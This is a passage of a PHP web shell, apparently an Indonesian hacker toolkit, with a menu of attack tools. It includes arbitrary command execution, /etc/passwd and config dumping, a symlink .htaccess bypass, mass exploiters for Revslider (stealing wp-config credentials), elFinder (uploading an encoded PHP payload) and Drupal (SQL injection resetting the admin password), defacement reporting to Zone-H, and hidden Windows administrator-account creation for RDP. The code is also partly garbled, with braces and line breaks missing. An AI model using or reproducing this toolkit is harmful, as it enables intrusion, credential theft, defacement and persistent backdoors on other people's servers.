						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('bypass-passwd') . "' style='width: 250px;' height='10'><center>Bypass Passwd</center></a>
    echo "<hr>";
elseif (isset($_GET[hex('bypass-cf') ]))
    echo '
				<form method="POST"><br><br><center><hr>
				<h2>Bypass CloudFlare Shell</h2>
				<div class = "row clearfix">
				<div class= "col-md-4">
				<select class="form-control" name="krz">
				<div class = "col-md-4">
				<input class="form-control" type="text" name="target" value="url">
				<div class = "col-md-4">
				<input class="form-control" type="submit" value="Bypass">


    $target = $_POST['target'];
    # Bypass From FTP
    if ($_POST['krz'] == "ftp")
        $ftp = gethostbyname("ftp." . "$target");
        echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct 
				ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
    # Bypass From Direct-Connect
    if ($_POST['krz'] == "direct-conntect")
        $direct = gethostbyname("direct-connect." . "$target");
        echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct 
				ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
    # Bypass From Webmail
    if ($_POST['krz'] == "webmail")
        $web = gethostbyname("webmail." . "$target");
        echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct 
				ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
    # Bypass From Cpanel
    if ($_POST['krz'] == "cpanel")
        $cpanel = gethostbyname("cpanel." . "$target");
        echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct 
				ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
elseif (isset($_GET[hex('bypass-server') ]))
    $dir = path();
			<form action="?dir=<?php echo $dir; ?>&amp;do=bypassserver" method="post">
				<center /><br />
				<h2>Bypass Server Shell</h2><br>
    print '
<form method="POST" action=""><br><center>
<b><font color=white><b><font color="black">Command </font></font></b>
<div class = "col-md-4">
<input name="baba" type="text" class="form-control" style="width:250px;" size="34">&nbsp;
<div class = "col-md-4">
<input type="submit" class="form-control" value="Execute!" style="width:350px;">
<form method="POST" action=""><strong><b><font color="black">Menu Bypass</font></strong>
<select name="liz0" size="1" class="form-control" style="width:250px;">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <br><input type="submit" class="form-control" style="width:350px;" value="Bypass!">
    $liz0 = shell_exec($_POST[baba]);
    $liz0zim = shell_exec($_POST[liz0]);
    $uid = shell_exec('id');
    $server = shell_exec('uname -a');
    echo "<pre><h4>";

    echo $liz0;
    echo $liz0zim;
    echo "</h4></pre>";
elseif (isset($_GET[hex('bypass-vhost') ]))
    echo "<hr><form method='POST' action=''>";
    echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
    echo "<center><input type='submit' value='Bypass it' name='Colii' class = 'form-control' style='width:250px;'></center>";
    if (isset($_POST['Colii']))
        system('ln -s / localhost.txt');
        $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
        $file = fopen(".htaccess", "w+");
        $write = fwrite($file, base64_decode($fvckem));
        $Bok3p = symlink("/", "Jaring1337.txt");
        $rt = "<br><a href=localhost.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
	Bypassed Successfully</b></font></a>";
        echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";
    echo "</form><hr><br>";
elseif (isset($_GET[hex('bypass-passwd') ]))
    echo '<hr><center><h2>Bypass Etc/Passwd </h2><br>
<table style="width:50%">
    <td><form method="post"><input type="submit" class = "form-control" value="System Function" name="syst"></form></td>
    <td><form method="post"><input type="submit" class = "form-control" value="Passthru Function" name="passth"></form></td>
    <td><form method="post"><input type="submit" class = "form-control" value="Exec Function" name="ex"></form></td>	
    <td><form method="post"><input type="submit" class = "form-control" value="Shell_exec Function" name="shex"></form></td>		
    <td><form method="post"><input type="submit" class = "form-control" value="Posix_getpwuid Function" name="melex"></form></td>
<h2>Bypass User</h2><table style="width:50%"><br>
    <td><form method="post"><input type="submit" class = "form-control" value="Awk Program" name="awkuser"></form></td>
    <td><form method="post"><input type="submit" class = "form-control" value="System Function" name="systuser"></form></td>
    <td><form method="post"><input type="submit" class = "form-control" value="Passthru Function" name="passthuser"></form></td>	
    <td><form method="post"><input type="submit" class = "form-control" value="Exec Function" name="exuser"></form></td>		
    <td><form method="post"><input type="submit" class = "form-control" value="Shell_exec Function" name="shexuser"></form></td>

    if ($_POST['awkuser'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
        echo "</textarea><br>";
    if ($_POST['systuser'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo system("ls /var/mail");
        echo "</textarea><br>";
    if ($_POST['passthuser'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo passthru("ls /var/mail");
        echo "</textarea><br>";
    if ($_POST['exuser'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo exec("ls /var/mail");
        echo "</textarea><br>";
    if ($_POST['shexuser'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo shell_exec("ls /var/mail");
        echo "</textarea><br>";
    if ($_POST['syst'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo system("cat /etc/passwd");
        echo "</textarea><br><br><b></b><br>";
    if ($_POST['passth'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo passthru("cat /etc/passwd");
        echo "</textarea><br><br><b></b><br>";
    if ($_POST['ex'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo exec("cat /etc/passwd");
        echo "</textarea><br><br><b></b><br>";
    if ($_POST['shex'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        echo shell_exec("cat /etc/passwd");
        echo "</textarea><br><br><b></b><br>";
    echo '<center>';
    if ($_POST['melex'])
        echo "<textarea class='form-control' cols='65' rows='15'>";
        for ($uid = 0;$uid < 60000;$uid++)
            $ara = posix_getpwuid($uid);
            if (!empty($ara))
                while (list($key, $val) = each($ara))
                    print "$val:";
                print "\n";
        echo "</textarea><br><br>";
elseif (isset($_GET[hex('exploiter') ]))
    echo "<hr><br>";
    echo "<center><h2>Exploiter Shell</h2></center><br>";
    echo "<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('csrf') . "' style='width: 250px;' height='10'><center>CSRF Exploiter</center></a>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('revslider') . "' style='width: 250px;' height='10'><center>Revslider Exploiter</center></a>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('elfinder') . "' style='width: 250px;' height='10'><center>Elfinder Exploiter</center></a>
						<div class = 'col-md-3'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('drupal') . "' style='width: 250px;' height='10'><center>Drupal Exploiter</center></a>
    echo "<hr>";
elseif (isset($_GET[hex('csrf') ]))

    echo '
<hr><br><center><h2 style="font-size:33px;">CSRF Exploiter Shell</h2><br><br>
<font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
<form method="POST" style="font-size:25px;" action= "">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px; width:450px;" class = "form-control" required autocomplete = "off"><br>
POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px; width:250px;" required class = "form-control" autocomplete = "off"><br>
<input style="width:350px;" type="submit" name="d" value="Lock!" class = "form-control">
    $url = $_POST["url"];
    $pf = $_POST["pf"];
    $d = $_POST["d"];
    if ($d)
        echo "
	<h2>Upload Your Files</h2>
	<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form>";
elseif (isset($_GET[hex('revslider') ]))

    echo "
<h2>Revslider Exploiter Shell</h2>
<form method='post'>
<textarea class='form-control' name='site' cols='50' rows='12'>
<input class='form-control' type='submit' style='width: 150px;' name='sikat' value='Gass!'>
    function findit($mytext, $starttag, $endtag)
        $posLeft = stripos($mytext, $starttag) + strlen($starttag);
        $posRight = stripos($mytext, $endtag, $posLeft + 1);
        return substr($mytext, $posLeft, $posRight - $posLeft);
    $ya = $_POST['sikat'];
    $co = $_POST['site'];
    if ($ya)
        $e = explode("
", $co);
        foreach ($e as $bda)
            //echo '<br>'.$bda;
            $linkof = '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
            $dn = ($bda) . ($linkof);
            $file = @file_get_contents($dn);
            if (eregi('DB_HOST', $file) and !eregi('FTP_USER', $file))
                echo '<center><font face="courier" color=white >----------------------------------------------</font></center>';
                echo "<center><font face='courier' color='lime' >" . $bda . "</font></center>";
                echo "<font face='courier' color=lime >DB name : </font>" . findit($file, "DB_NAME', '", "');") . "<br>";
                echo "<font face='courier' color=lime >DB user : </font>" . findit($file, "DB_USER', '", "');") . "<br>";
                echo "<font face='courier' color=lime >DB pass : </font>" . findit($file, "DB_PASSWORD', '", "');") . "<br>";
                echo "<font face='courier' color=lime >DB host : </font>" . findit($file, "DB_HOST', '", "');") . "<br>";
            elseif (eregi('DB_HOST', $file) and eregi('FTP_USER', $file))
                echo '<center><font face="courier" color=white >----------------------------------------------</font></center>';
                echo "<center><font face='courier' color='lime' >" . $bda . "</font></center>";
                echo "<font face='courier' color=lime >FTP user : </font>" . findit($file, "FTP_USER','", "');") . "<br>";
                echo "<font face='courier' color=lime >FTP pass : </font>" . findit($file, "FTP_PASS','", "');") . "<br>";
                echo "<font face='courier' color=lime >FTP host : </font>" . findit($file, "FTP_HOST','", "');") . "<br>";
                echo "<center><font face='courier' color='red' >" . $bda . " ----> not infected </font></center>";
            echo '<center><font face="courier" color=white >----------------------------------------------</font></center>';
elseif (isset($_GET[hex('elfinder') ]))

    echo "<hr><br>";
    echo "<center>";
    echo '<h2>ElFinder Mass Exploiter</h2>';
    echo '<form method="post">
Target: <br>
<textarea class = "form-control" name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
<input class = "form-control" type="submit" name="x" style="width: 150px; height: 35px; margin: 5px;" value="SIKAT!">
    function ngirim($url, $isi)
        $ch = curl_init("$url");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
        curl_setopt($ch, CURLOPT_COOKIEJAR, 'coker_log');
        curl_setopt($ch, CURLOPT_COOKIEFILE, 'coker_log');
        $data3 = curl_exec($ch);
        return $data3;
    $target = explode("
", $_POST['target']);
    if ($_POST['x'])
        foreach ($target as $korban)
            $nama_doang = "localhost.php";
            $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
            $decode_isi = base64_decode($isi_nama_doang);
            $encode = base64_encode($nama_doang);
            $fp = fopen($nama_doang, "w");
            fputs($fp, $decode_isi);
            echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
            echo "# Upload[1] ......<br>";
            $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
            $b = file_get_contents("$url_mkfile");
            $post1 = array(
                "cmd" => "put",
                "target" => "l1_$encode",
                "content" => "$decode_isi",
            $post2 = array(
                "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
                "upload[]" => "@$nama_doang",
            $output_mkfile = ngirim("$korban", $post1);
            if (preg_match("/$nama_doang/", $output_mkfile))
                echo "<font color='lime'># Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...</font><br><br>";
                echo "<font color='red'># Upload Gagal Cok! 1 <br># Uploading 2..</font><br>";
                $upload_ah = ngirim("$korban?cmd=upload", $post2);
                if (preg_match("/$nama_doang/", $upload_ah))
                    echo "<font color='lime'># Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...</font><br><br>";
                    echo "<font color='red'># Upload Gagal Lagi Cok! 2</font><br><br>";
elseif (isset($_GET[hex('drupal') ]))

    echo "<center><hr><br>";
    echo "
		<h2>Drupal Mass Exploiter</h2><br>
		<form method='post' action=''>
		<textarea rows='10'class='form-control' cols='10' name='url'>
		<input type='submit' class='form-control' style='width:250px;' name='submit' value='SIKAT!'>
    $drupal = ($_GET["drupal"]);
    if ($drupal == 'drupal')
        $filename = $_FILES['file']['name'];
        $filetmp = $_FILES['file']['tmp_name'];
        echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
   <input type='file'name='file' />
   <input type='submit' value='drupal !' />
        move_uploaded_file($filetmp, $filename);
    if (isset($_POST['submit']))
        function exploit($url)
            $post_data = "name[0;update users set name %3D 'Exorcism' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
            $params = array(
                'http' => array(
                    'method' => 'POST',
                    'header' => "Content-Type: application/x-www-form-urlencoded
                    'content' => $post_data
            $ctx = stream_context_create($params);
            $data = file_get_contents($url . '/user/login/', null, $ctx);
            if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data))
                $fp = fopen("exploited.txt", 'a+');
                fwrite($fp, "Exploitied  User: Exorcism Pass: Exorcism  =====> {$url}/user/login");
                fwrite($fp, "
                fwrite($fp, "--------------------------------------------------------------------------------------------------");
                fwrite($fp, "
                echo "<font color='lime'><b>Success:<font color='white'>Exorcism</font> Pass:<font color='white'>Exorcism</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
                echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
        $urls = explode("
", $_POST['url']);
        foreach ($urls as $url)
            $url = @trim($url);
            echo exploit($url);
elseif (isset($_GET[hex('auto_tools') ]))

    echo '<hr><center><h2>Auto Tools Shell </h2><br>
<table style="width:90%">
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("zone-h") . '><center>Zone H</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("defacer-id") . '><center>Defacer ID</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("jumping") . '><center>Jumping</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("fake-root") . '><center>Fake Root</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("adminer") . '><center>Adminer</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("wp-hijack") . '><center>Wp Auto Hijack</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("cpanel-reset") . '><center>Cpanel Reset</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("zip-menu") . '><center>Zip Menu</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("reverse-ip") . '><center>Reverse IP</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("rdp") . '><center>K-RDP Shell</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("ransomware") . '><center>Ransomware</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("whois") . '><center>WhoIs</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("phpinfo") . '><center>Php Info</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("inject-code") . '><center>Inject Code</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("db-dump") . '><center>DB Dump</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("cp-crack") . '><center>Cpanel Crack</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("smtp-grab") . '><center>SMTP Grabber</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("domains") . '><center>Domains Viewer</center></a></td>
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("whmcs-decoder") . '><center>WHMCS Decoder</center></a></td>	
    <td><a class = "form-control ajx" href = ?d=' . hex($d) . '&' . hex("delete-logs") . '><center>Delete Logs</center></a></td>
elseif (isset($_GET[hex('zone-h') ]))
				<form action="" method="post">
						<h2>Zone H Submit Shell</h2>
						<u>Defacer :</u>
						<input type="text" name="defacer" style="width: 250px; height: 30px;" value="Your Zone-h Name" class="form-control" />
						<u>Attacks Method :</u>
						<select name="hackmode" class="form-control" style="width: 250px; height: 40px;">
							<option value="1">known vulnerability (i.e. unpatched system)</option>
							<option value="2">undisclosed (new) vulnerability</option>
							<option value="3">configuration / admin. mistake</option>
							<option value="4">brute force attack</option>
							<option value="5">social engineering</option>
							<option value="6">Web Server intrusion</option>
							<option value="7">Web Server external module intrusion</option>
							<option value="8">Mail Server intrusion</option>
							<option value="9">FTP Server intrusion</option>
							<option value="10">SSH Server intrusion</option>
							<option value="11">Telnet Server intrusion</option>
							<option value="12">RPC Server intrusion</option>
							<option value="13">Shares misconfiguration</option>
							<option value="14">Other Server intrusion</option>
							<option value="15">SQL Injection</option>
							<option value="16">URL Poisoning</option>
							<option value="17">File Inclusion</option>
							<option value="18">Other Web Application bug</option>
							<option value="19">Remote administrative panel access bruteforcing</option>
							<option value="20">Remote administrative panel access password guessing</option>
							<option value="21">Remote administrative panel access social engineering</option>
							<option value="22">Attack against administrator(password stealing/sniffing)</option>
							<option value="23">Access credentials through Man In the Middle attack</option>
							<option value="24">Remote service password guessing</option>
							<option value="25">Remote service password bruteforce</option>
							<option value="26">Rerouting after attacking the Firewall</option>
							<option value="27">Rerouting after attacking the Router</option>
							<option value="28">DNS attack through social engineering</option>
							<option value="29">DNS attack through cache poisoning</option>
							<option value="30">Not available</option>
						<u>Reasons :</u>
						<select name="reason" class="form-control" style="width: 250px; height: 40px;">
							<option style='display:block;width:100%;'>--------SELECT--------</option>
							<option value="1">Heh...just for fun!</option>
							<option value="2">Revenge against that website</option>
							<option value="3">Political reasons</option>
							<option value="4">As a challenge</option>
							<option value="5">I just want to be the best defacer</option>
							<option value="6">Patriotism</option>
							<option value="7">Not available</option>
						<textarea class="form-control" name="domain" style='display:block;width:25%;height:150px;'>List Of Domains</textarea>
						<p>(1 Domain Per Lines)</p>
						<input type="submit" class="form-control" style="width: 250px; height: 40px;" value="Send Now !" name="SendNowToZoneH" />
				<hr><br><span style="color:red">
    function ZoneH($url, $hacker, $hackmode, $reson, $site)
        $k = curl_init();
        curl_setopt($k, CURLOPT_URL, $url);
        curl_setopt($k, CURLOPT_POST, true);
        curl_setopt($k, CURLOPT_POSTFIELDS, "defacer=" . $hacker . "&domain1=" . $site . "&hackmode=" . $hackmode . "&reason=" . $reson);
        curl_setopt($k, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
        $kubra = curl_exec($k);
        return $kubra;

    if (isset($_POST['SendNowToZoneH']))
        $sub = @get_loaded_extensions();
        if (!in_array("curl", $sub))
            die('[-] Curl Is Not Supported !! ');

        $hacker = $_POST['defacer'];
        $method = $_POST['hackmode'];
        $neden = $_POST['reason'];
        $site = $_POST['domain'];

        if ($hacker == "Your Zone-h Name")
            die("[-] You Must Fill the Attacker name !");
        elseif ($method == "--------SELECT--------")
            die("[-] You Must Select The Method !");
        elseif ($neden == "--------SELECT--------")
            die("[-] You Must Select The Reason");
        elseif (empty($site))
            die("[-] You Must Inter the Sites List ! ");
        $i = 0;
        $sites = explode("\n", $site);
        while ($i < count($sites))
            if (substr($sites[$i], 0, 4) != "http")
                $sites[$i] = "http://" . $sites[$i];
            ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
            echo "Site : " . $sites[$i] . " Defaced !<br>";
        echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!";
elseif (isset($_GET[hex('defacer-id') ]))

    echo "<hr><br><center>
		<h2>Defacer ID Submit Shell</h2>
		<form method='post'>
		<u>Defacer</u>: <br>
		<input class = 'form-control' style='width:250px; height:40px;' type='text' name='hekel' size='50' value='dph.sudo'><br>
		<u>Team</u>: <br>
		<input class = 'form-control' style='width:250px; height:40px;' type='text' name='tim' size='50' value='Attacker'><br>
		<u>Domains</u>: <br>
		<textarea class = 'form-control' style='width: 450px; height: 150px;' name='sites'></textarea><br>
		<input  class = 'form-control' style='width:250px; height:40px; 'type='submit' name='go' value='Submit'>
    $site = explode("\r\n", $_POST['sites']);
    $go = $_POST['go'];
    $hekel = $_POST['hekel'];
    $tim = $_POST['tim'];
    if ($go)
        foreach ($site as $sites)
            $zh = $sites;
            $form_url = "https://www.defacer.id/notify";
            $data_to_post = array();
            $data_to_post['attacker'] = "$hekel";
            $data_to_post['team'] = "$tim";
            $data_to_post['poc'] = 'SQL Injection';
            $data_to_post['url'] = "$zh";
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $form_url);
            curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post));
            curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
            curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
            $result = curl_exec($curl);
            echo $result;
            echo "<br>";
elseif (isset($_GET[hex('jumping') ]))

    echo "<hr><br><center><h2>Jumping Shell</h2>";
    echo "<form method = 'POST' action = ''>";
    echo "<input type = 'submit' name = 'jump' class='form-control' style='width:250px;height:40px;' value = 'Jump!'> ";
    echo "<hr><br></center>";

    if (isset($_POST['jump']))

        $i = 0;
        echo "<pre><div class='margin: 5px auto;'>";
        $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
        while ($passwd = fgets($etc))
            if ($passwd == '' || !$etc)
                echo "<font color=red>Can't read /etc/passwd</font>";
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach ($user_jumping[1] as $user_Exc_jump)
                    $user_jumping_dir = "/home/$user_Exc_jump/public_html";
                    if (is_readable($user_jumping_dir))
                        $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
                        if (is_writable($user_jumping_dir))
                            $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
                        echo $jrw;
                        if (function_exists('posix_getpwuid'))
                            $domain_jump = file_get_contents("/etc/named.conf");
                            if ($domain_jump == '')
                                echo " => ( <font color=red>tidak boleh mendapatkan nama domain</font> )<br>";
                                preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
                                foreach ($domains_jump[1] as $dj)
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if ($user_jumping_url == $user_Exc_jump)
                                        echo " => ( <u>$dj</u> )<br>";
                            echo "<br>";
        if ($i == 0)
            echo "<br>Total ada " . $i . " Kamar di " . gethostbyname($_SERVER['HTTP_HOST']) . "";
        echo "</div></pre>";
elseif (isset($_GET[hex('fake-root') ]))

    if (!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die("I Think this server is not using shared host ");
    function reverse($url)
        $ch = curl_init("http://domains.yougetsignal.com/domains.php");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_POST, 1);
        $resp = curl_exec($ch);
        $resp = str_replace("[", "", str_replace("]", "", str_replace("\"\"", "", str_replace(", ,", ",", str_replace("{", "", str_replace("{", "", str_replace("}", "", str_replace(", ", ",", str_replace(", ", ",", str_replace("'", "", str_replace("'", "", str_replace(":", ",", str_replace('"', '', $resp)))))))))))));
        $array = explode(",,", $resp);
        foreach ($array as $lnk)
            $lnk = "http://$lnk";
            $lnk = str_replace(",", "", $lnk);
            echo $lnk . "\n";
    function cek($url)
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $resp = curl_exec($ch);
        return $resp;
    $cwd = getcwd();
    $ambil_user = explode("/", $cwd);
    $user = $ambil_user[2];
    if ($_POST['reverse'])
        $site = explode("\r\n", $_POST['url']);
        $file = $_POST['file'];
        foreach ($site as $url)
            $cek = cek("$url/~$user/$file");
            if (preg_match("/hacked/i", $cek))
                echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
        echo "<hr><br><center><h2>Fake Root Shell</h2><form method='post'>
		Filename: <br><input class='form-control' type='text' name='file' value='deface.html' style='width:300px;height:40px;'><br>
		User: <br><input class='form-control' type='text' value='$user' size='50' height='10' readonly style='width:300px;height:40px;'><br>
		Domain: <br>
		<textarea class='form-control' style='width: 450px; height: 250px;' name='url'>";
        echo "</textarea><br>
		<input class='form-control' type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
		NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center><hr><br>";
elseif (isset($_GET[hex('adminer') ]))

    echo "<hr><br>";
    echo "<center><h2>Adminer Shell</h2>";
    echo "<input type='submit' class='form-control' value='Spawn Adminer' style='width:250px;height:40px;' name='do_adminer'></center>";
    echo "<hr><br>";

    if (isset($_POST['do_adminer']))

        $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
        function adminer($url, $isi)
            $fp = fopen($isi, "w");
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_FILE, $fp);
            return curl_exec($ch);
        if (file_exists('adminer.php'))
            echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
            if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php"))
                echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
                echo "<center><font color=red>gagal buat file adminer</font></center>";
elseif (isset($_GET[hex('rdp') ]))
    if (strtolower(substr(PHP_OS, 0, 3)) === 'win')
        if ($_POST['create'])
            $user = htmlspecialchars($_POST['user']);
            $pass = htmlspecialchars($_POST['pass']);
            if (preg_match("/$user/", exe("net user")))
                echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
                $add_user = exe("net user $user $pass /add");
                $add_groups1 = exe("net localgroup Administrators $user /add");
                $add_groups2 = exe("net localgroup Administrator $user /add");
                $add_groups3 = exe("net localgroup Administrateur $user /add");
                echo "[ RDP ACCOUNT INFO ]<br>
                IP: <font color=lime>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br>
                Username: <font color=lime>$user</font><br>
                Password: <font color=lime>$pass</font><br>
                [ STATUS ]<br>
                if ($add_user)
                    echo "[add user] -> <font color='lime'>Berjaya</font><br>";
                    echo "[add user] -> <font color='red'>Gagal</font><br>";
                if ($add_groups1)
                    echo "[add localgroup Administrators] -> <font color='lime'>Berjaya</font><br>";
                elseif ($add_groups2)
                    echo "[add localgroup Administrator] -> <font color='lime'>Berjaya</font><br>";
                elseif ($add_groups3)
                    echo "[add localgroup Administrateur] -> <font color='lime'>Berjaya</font><br>";
                    echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
                echo "------------------------------<br>";
        elseif ($_POST['s_opsi'])
            $user = htmlspecialchars($_POST['r_user']);
            if ($_POST['opsi'] == '1')
                $cek = exe("net user $user");
                echo "Checking username <font color=lime>$user</font> ....... ";
                if (preg_match("/$user/", $cek))
